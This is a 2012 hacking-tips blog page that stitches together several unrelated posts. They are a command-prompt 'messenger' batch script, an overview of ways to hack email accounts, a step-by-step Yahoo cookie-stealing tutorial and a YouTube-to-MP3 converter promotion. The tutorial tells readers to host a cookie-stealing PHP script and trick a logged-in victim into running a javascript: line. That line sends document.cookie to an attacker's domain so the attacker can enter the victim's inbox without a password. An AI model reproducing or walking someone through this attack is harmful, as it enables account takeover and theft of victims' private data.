Worlds best mobile and pc hacking tips&tricks....!

19 December 2012

Hello friends! Using this trick you can chat with your friends by using command prompt in windows;
1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:


7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

DONE....ENJOY.~!!
Do U Think If Your Email Can Not Been Hackable, Then You Are Wrong...
Ur Email-ID Can Be Hack... But Its Can Be Hack Only Fault by User.. Most Of The Peoples Think That Their Has A Software to Hack A Email- ID's But Truth Is Their Is No Software Present For Hacking Ur MailID's..
Email Hacking can be possibleto many ways like :-

1. Social Engineering
2.Phishing Attacks
3. Cookie Hijacking
4. By Keyloggers
Social Engineering:
This Process is defined as Hack the human mind without any tools...
This has become one of the hottest topics today and it seems towork out most of the times. Social Engineering doesn’t deal with the network security issues, vulnerabilities, exploits, etc. It just deals with simple Psychological tricks that help to get the information wewant.
This really works!! But it requires a lot of patience.
We are all talking about network security and fixing the vulnerabilities in networks.
 But what happens if some internal person of a network accidentally gives out the passwords. After all we are all humans; we are also vulnerable and can be easily
 exploited and compromised than the computers.
Social Engineering attacks have become most common during the chatsessions.
With the increase in use of Instant Messengers, any anonymous person may have a
chat with another any where in the world. The most crucial part of this attack is to
win the trust ofthe victim.
Phishing Attack:
The act of sending an e-mail to a userfalsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the userto visit a Web site where theyare asked to update personal information, such as passwords andcredit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to stealthe user’s information.
Cookie Hijacking:
In cookie hijacking we can hack email accounts very easily.. This trick is very
 dangereous because whenever user change a password thenthere is no need to
 attacker for again hack Email- ID of victim. And it would take youto inbox of victim's yahoo account without askingfor any password of victim account.
Keyloggers:
Keylogger is a software program or hardware device that is used to monitor and log
each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can thenview all keys typed in by thatuser. Because
these programs and hardware devices monitor the keys typed in a user can easily
find user passwords andother information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees
 use work computers for business purposes only. Unfortunately, keyloggers can also
 be embedded in spyware allowing your information to be transmitted to an unknownthird party.
Cookie Hijacking:
U Can Hack Yahoo Account by Cookies Stealing or Hijacking From Browser.
Follow Steps and Learn it.
This is very Simple Tutorial and 100% Tested..!!..
Step 1: Download the Script on given link
http://www.multiupload.com/9Q3EPTOO47
Step:2 Download and extract files into your hard drive.
Step:3 Create a account in any ftp hosting sitei suggested www.t35.com
Step4: Login to your account and upload 4 files into your ftp account.
Step5: Give this code to victim to run in his browser when he would be logged in to hisyahoo account.Yahoo.php is basically cookiestealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
He would againredirected to his yahoo account.
Step6. Open the hacked.php. The passwordis 'hoc'.
You must have got the username of victim's account. SimplyClick on it and it would take you to inbox ofvictim's yahoo account without askingfor any password of victim account.
Convert Youtube to Mp3 audio iPod iPhone and PSP
Tags: AVI, FLV Flash, Ipod, media converter, mp3,psp, YouTube video converterMusic Widgets, Tools, Web 2.0
Bender Converter is an easy-to-use online application for downloading and convertingvideos from such services as YouTube, Daily Motion, Mega Video, Vimeo, TwitVid.com, Veoh, Google Video and many others. You can download video and audio in MP3, AVI, FLV Flash, iPod / iPhone and other popular formats. The service is fast and doesn’t require you to register. All thatyou need is a link to a page with a video and our software.
It works in four simple steps:
1) Choose the format in which you want to download the video / audio.
2) Enter the complete address of the webpage with the video (for example: http://www.youtube.com/watch?v=eCeahsbZk14).
3) Press the “Convert” button.
4) Press the “Download” button to save file to your computer and you ready to go.

Blog Archive

Contact Us

About Us

Privacy Policy

Copyright © The Way oF HacKeRs....! | Powered by Blogger
Design by Crackiapps | Blogger Template by Crackiapps.blogspot.com